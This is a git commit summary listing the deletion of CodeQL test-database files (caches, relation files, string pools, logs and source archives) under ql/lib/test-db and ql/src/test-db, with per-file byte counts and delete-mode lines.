.../db-yaml/default/cache/pages/b4.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/b4.pack.d | Bin 156 -> 0 bytes .../db-yaml/default/cache/pages/b7.pack | Bin 282 -> 0 bytes .../db-yaml/default/cache/pages/b9.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/bc.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/bc.pack.d | Bin 596 -> 0 bytes .../db-yaml/default/cache/pages/c0.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/c3.pack | Bin 115 -> 0 bytes .../db-yaml/default/cache/pages/e0.pack | Bin 92 -> 0 bytes .../db-yaml/default/cache/pages/f3.pack | Bin 152 -> 0 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/predicates/02.pack | Bin 154 -> 0 bytes .../db-yaml/default/cache/predicates/03.pack 
| Bin 144 -> 0 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 151 -> 0 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 136 -> 0 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 152 -> 0 bytes .../db-yaml/default/cache/predicates/3b.pack | Bin 151 -> 0 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 170 -> 0 bytes .../db-yaml/default/cache/predicates/53.pack | Bin 141 -> 0 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 140 -> 0 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 161 -> 0 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/7c.pack | Bin 161 -> 0 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 141 -> 0 bytes .../db-yaml/default/cache/predicates/a1.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/a2.pack | Bin 144 -> 0 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 157 -> 0 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 148 -> 0 bytes .../db-yaml/default/cache/predicates/d4.pack | Bin 170 -> 0 bytes .../db-yaml/default/cache/predicates/e3.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 154 -> 0 bytes .../db-yaml/default/cache/relations/06.pack | Bin 289 -> 0 bytes .../db-yaml/default/cache/relations/10.pack | Bin 126 -> 0 bytes 
.../db-yaml/default/cache/relations/11.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/19.pack | Bin 289 -> 0 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/2a.pack | Bin 177 -> 0 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/39.pack | Bin 272 -> 0 bytes .../db-yaml/default/cache/relations/4b.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/56.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/5c.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/7c.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/9f.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/a0.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 109 -> 0 bytes .../db-yaml/default/cache/relations/bf.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/d3.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/e9.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/f9.pack | Bin 143 -> 0 bytes ql/lib/test-db/db-yaml/default/cache/version | 1 - .../db-yaml/default/containerparent.rel | Bin 80 -> 0 bytes .../default/containerparent.rel.checksum | Bin 12 -> 0 bytes ql/lib/test-db/db-yaml/default/files.rel | Bin 8 -> 0 bytes .../db-yaml/default/files.rel.checksum | Bin 12 -> 0 bytes ql/lib/test-db/db-yaml/default/folders.rel | Bin 80 -> 0 bytes .../db-yaml/default/folders.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/locations_default.rel | Bin 1416 -> 0 bytes .../default/locations_default.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/pools/0/buckets/info | Bin 40 -> 0 bytes .../default/pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes ql/lib/test-db/db-yaml/default/pools/0/info | Bin 33 -> 0 bytes 
.../db-yaml/default/pools/0/metadata/info | Bin 40 -> 0 bytes .../default/pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../db-yaml/default/pools/1/buckets/info | Bin 40 -> 0 bytes .../default/pools/1/buckets/page-000000 | Bin 8192 -> 0 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 40 -> 0 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 8192 -> 0 bytes .../db-yaml/default/pools/1/indices1/info | Bin 40 -> 0 bytes .../default/pools/1/indices1/page-000000 | Bin 8192 -> 0 bytes ql/lib/test-db/db-yaml/default/pools/1/info | Bin 41 -> 0 bytes .../db-yaml/default/pools/1/metadata/info | Bin 40 -> 0 bytes .../default/pools/1/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/1/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/lib/test-db/db-yaml/default/pools/poolInfo | Bin 32 -> 0 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 4 -> 0 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 12 -> 0 bytes .../default/strings/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/lib/test-db/db-yaml/default/yaml.rel | Bin 1416 -> 0 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/yaml_locations.rel | Bin 472 -> 0 bytes .../default/yaml_locations.rel.checksum | Bin 12 -> 0 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 552 -> 0 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 12 -> 0 bytes ql/lib/test-db/db-yaml/yaml.dbscheme | 80 ----- ...-diagnostics-add-20240203T091755.518Z.json | 0 ...-diagnostics-add-20240203T091756.033Z.json | 0 .../database-create-20240203.101754.571.log | 275 ----------------- ...tabase-index-files-20240203.101755.239.log | 15 - ql/lib/test-db/src.zip | Bin 578 -> 0 bytes ql/src/test-db/baseline-info.json | 1 - ql/src/test-db/codeql-database.yml | 
10 - ql/src/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 40 -> 0 bytes .../pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 40 -> 0 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 8192 -> 0 bytes .../cached-strings/pools/0/indices1/info | Bin 40 -> 0 bytes .../pools/0/indices1/page-000000 | Bin 8192 -> 0 bytes .../default/cache/cached-strings/pools/0/info | Bin 41 -> 0 bytes .../cached-strings/pools/0/metadata/info | Bin 40 -> 0 bytes .../pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../cache/cached-strings/pools/poolInfo | Bin 28 -> 0 bytes .../cache/cached-strings/tuple-pool/header | Bin 4 -> 0 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 16 -> 0 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 80 -> 0 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 116 -> 0 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 80 -> 0 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 4776 -> 0 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 16 -> 0 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 12 -> 0 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 16 -> 0 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 12 -> 0 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 16 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 12 -> 0 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 24 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-15fd6561 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-15fd6561#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-729b2108 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-729b2108#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-7595a81e | Bin 16 -> 0 bytes 
...king#f6f2598d--TaintFlow-7595a81e#0#tttttt | Bin 260 -> 0 bytes ...Tracking#f6f2598d--TaintFlow-7595a81e#1#tt | Bin 68 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-cd159b4d | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-cd159b4d#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-d2947120 | Bin 16 -> 0 bytes ...tTracking#f6f2598d--TaintFlow-d2947120#0#t | Bin 2392 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-d8fdd114 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-d8fdd114#0# | Bin 12 -> 0 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 16 -> 0 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 12 -> 0 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 16 -> 0 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 12 -> 0 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 16 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 12 -> 0 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 16 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 12 -> 0 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 16 -> 0 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 12 -> 0 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 24 -> 0 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 16 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 12 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 12 -> 0 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 16 -> 0 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 12 -> 0 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 128 -> 0 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 16 -> 0 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 12 -> 0 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 16 -> 0 bytes 
...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 12 -> 0 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 16 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 12 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 12 -> 0 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 16 -> 0 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 16 -> 0 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 16 -> 0 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 12 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 16 -> 0 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 2392 -> 0 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 16 -> 0 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 12 -> 0 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 16 -> 0 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 12 -> 0 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 16 -> 0 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 12 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 16 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 12 -> 0 bytes .../tuples#printAst#38acf19d--TPrintNode | Bin 16 -> 0 bytes .../tuples#printAst#38acf19d--TPrintNode#0#e | Bin 2672 -> 0 bytes .../db-yaml/default/cache/pages/02.pack | Bin 79 -> 0 bytes .../db-yaml/default/cache/pages/04.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 125 -> 0 bytes .../db-yaml/default/cache/pages/29.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 162 -> 0 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 91 -> 0 bytes .../db-yaml/default/cache/pages/2e.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/2e.pack.d | Bin 316 -> 0 bytes .../db-yaml/default/cache/pages/32.pack | Bin 112 -> 0 bytes .../db-yaml/default/cache/pages/46.pack | Bin 99 -> 0 bytes .../db-yaml/default/cache/pages/4b.pack | Bin 65 -> 0 bytes 
.../db-yaml/default/cache/pages/4b.pack.d | Bin 3805 -> 0 bytes .../db-yaml/default/cache/pages/67.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/67.pack.d | Bin 664 -> 0 bytes .../db-yaml/default/cache/pages/71.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/71.pack.d | Bin 618 -> 0 bytes .../db-yaml/default/cache/pages/82.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/82.pack.d | Bin 354 -> 0 bytes .../db-yaml/default/cache/pages/91.pack | Bin 112 -> 0 bytes .../db-yaml/default/cache/pages/92.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/92.pack.d | Bin 2612 -> 0 bytes .../db-yaml/default/cache/pages/95.pack | Bin 124 -> 0 bytes .../db-yaml/default/cache/pages/99.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/99.pack.d | Bin 1311 -> 0 bytes .../db-yaml/default/cache/pages/a3.pack | Bin 149 -> 0 bytes .../db-yaml/default/cache/pages/a3.pack.d | Bin 797 -> 0 bytes .../db-yaml/default/cache/pages/a4.pack | Bin 106 -> 0 bytes .../db-yaml/default/cache/pages/ab.pack | Bin 119 -> 0 bytes .../db-yaml/default/cache/pages/b6.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/b6.pack.d | Bin 324 -> 0 bytes .../db-yaml/default/cache/pages/bd.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/ce.pack | Bin 173 -> 0 bytes .../db-yaml/default/cache/pages/d0.pack | Bin 85 -> 0 bytes .../db-yaml/default/cache/pages/de.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/de.pack.d | Bin 688 -> 0 bytes .../db-yaml/default/cache/pages/df.pack | Bin 86 -> 0 bytes .../db-yaml/default/cache/pages/e4.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/e6.pack | Bin 117 -> 0 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/predicates/01.pack | Bin 212 -> 0 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 339 -> 0 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 232 -> 0 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 145 -> 0 bytes 
.../db-yaml/default/cache/predicates/10.pack | Bin 151 -> 0 bytes .../db-yaml/default/cache/predicates/1f.pack | Bin 210 -> 0 bytes .../db-yaml/default/cache/predicates/20.pack | Bin 220 -> 0 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 537 -> 0 bytes .../db-yaml/default/cache/predicates/25.pack | Bin 214 -> 0 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/28.pack | Bin 423 -> 0 bytes .../db-yaml/default/cache/predicates/2a.pack | Bin 214 -> 0 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 152 -> 0 bytes .../db-yaml/default/cache/predicates/32.pack | Bin 211 -> 0 bytes .../db-yaml/default/cache/predicates/36.pack | Bin 213 -> 0 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 367 -> 0 bytes .../db-yaml/default/cache/predicates/43.pack | Bin 223 -> 0 bytes .../db-yaml/default/cache/predicates/45.pack | Bin 410 -> 0 bytes .../db-yaml/default/cache/predicates/57.pack | Bin 411 -> 0 bytes .../db-yaml/default/cache/predicates/59.pack | Bin 408 -> 0 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 375 -> 0 bytes .../db-yaml/default/cache/predicates/5b.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/5d.pack | Bin 204 -> 0 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 161 -> 0 bytes .../db-yaml/default/cache/predicates/66.pack | Bin 225 -> 0 bytes .../db-yaml/default/cache/predicates/6c.pack | Bin 206 -> 0 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/74.pack | Bin 418 -> 0 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 345 -> 0 bytes .../db-yaml/default/cache/predicates/78.pack | Bin 220 -> 0 bytes .../db-yaml/default/cache/predicates/7b.pack | Bin 210 -> 0 bytes .../db-yaml/default/cache/predicates/7e.pack | Bin 220 -> 0 bytes 
.../db-yaml/default/cache/predicates/83.pack | Bin 207 -> 0 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 341 -> 0 bytes .../db-yaml/default/cache/predicates/8d.pack | Bin 212 -> 0 bytes .../db-yaml/default/cache/predicates/96.pack | Bin 217 -> 0 bytes .../db-yaml/default/cache/predicates/98.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 336 -> 0 bytes .../db-yaml/default/cache/predicates/9f.pack | Bin 211 -> 0 bytes .../db-yaml/default/cache/predicates/a0.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/a9.pack | Bin 217 -> 0 bytes .../db-yaml/default/cache/predicates/bd.pack | Bin 250 -> 0 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 157 -> 0 bytes .../db-yaml/default/cache/predicates/c9.pack | Bin 219 -> 0 bytes .../db-yaml/default/cache/predicates/ca.pack | Bin 254 -> 0 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 363 -> 0 bytes .../db-yaml/default/cache/predicates/d5.pack | Bin 260 -> 0 bytes .../db-yaml/default/cache/predicates/dc.pack | Bin 212 -> 0 bytes .../db-yaml/default/cache/predicates/de.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/df.pack | Bin 217 -> 0 bytes .../db-yaml/default/cache/predicates/e0.pack | Bin 207 -> 0 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/ef.pack | Bin 221 -> 0 bytes .../db-yaml/default/cache/predicates/f8.pack | Bin 215 -> 0 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 154 -> 0 bytes .../db-yaml/default/cache/predicates/ff.pack | Bin 253 -> 0 bytes .../db-yaml/default/cache/relations/07.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/0d.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/0e.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/10.pack | Bin 126 -> 0 bytes 
.../db-yaml/default/cache/relations/14.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/18.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/19.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/1b.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/28.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 177 -> 0 bytes .../db-yaml/default/cache/relations/39.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/47.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/4d.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/52.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/56.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/59.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/5b.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/5d.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/80.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/85.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/8b.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/aa.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 109 -> 0 bytes .../db-yaml/default/cache/relations/c1.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/cc.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/d0.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/d5.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/da.pack | Bin 126 -> 0 bytes ql/src/test-db/db-yaml/default/cache/version | 1 - .../db-yaml/default/containerparent.rel | Bin 128 -> 0 bytes .../default/containerparent.rel.checksum | Bin 12 -> 0 bytes ql/src/test-db/db-yaml/default/files.rel | Bin 56 -> 0 bytes 
.../db-yaml/default/files.rel.checksum | Bin 12 -> 0 bytes ql/src/test-db/db-yaml/default/folders.rel | Bin 80 -> 0 bytes .../db-yaml/default/folders.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/locations_default.rel | Bin 7992 -> 0 bytes .../default/locations_default.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/pools/0/buckets/info | Bin 40 -> 0 bytes .../default/pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes ql/src/test-db/db-yaml/default/pools/0/info | Bin 33 -> 0 bytes .../db-yaml/default/pools/0/metadata/info | Bin 40 -> 0 bytes .../default/pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../db-yaml/default/pools/1/buckets/info | Bin 40 -> 0 bytes .../default/pools/1/buckets/page-000000 | Bin 8192 -> 0 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 40 -> 0 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 8192 -> 0 bytes .../db-yaml/default/pools/1/indices1/info | Bin 40 -> 0 bytes .../default/pools/1/indices1/page-000000 | Bin 8192 -> 0 bytes ql/src/test-db/db-yaml/default/pools/1/info | Bin 41 -> 0 bytes .../db-yaml/default/pools/1/metadata/info | Bin 40 -> 0 bytes .../default/pools/1/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/1/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/src/test-db/db-yaml/default/pools/poolInfo | Bin 32 -> 0 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 4 -> 0 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 12 -> 0 bytes .../default/strings/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/src/test-db/db-yaml/default/yaml.rel | Bin 7992 -> 0 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/yaml_locations.rel | Bin 2664 -> 0 bytes .../default/yaml_locations.rel.checksum | Bin 12 -> 0 bytes 
.../test-db/db-yaml/default/yaml_scalars.rel | Bin 3048 -> 0 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 12 -> 0 bytes ql/src/test-db/db-yaml/yaml.dbscheme | 80 ----- ...-diagnostics-add-20240203T091753.298Z.json | 0 ...-diagnostics-add-20240203T091754.191Z.json | 0 .../database-create-20240203.101751.644.log | 281 ------------------ ...tabase-index-files-20240203.101752.962.log | 21 -- ql/src/test-db/src.zip | Bin 3816 -> 0 bytes 411 files changed, 776 deletions(-) delete mode 100644 ql/lib/test-db/baseline-info.json delete mode 100644 ql/lib/test-db/codeql-database.yml delete mode 100644 ql/lib/test-db/db-yaml/default/cache/.lock delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 delete mode 100644 
ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# delete mode 100644 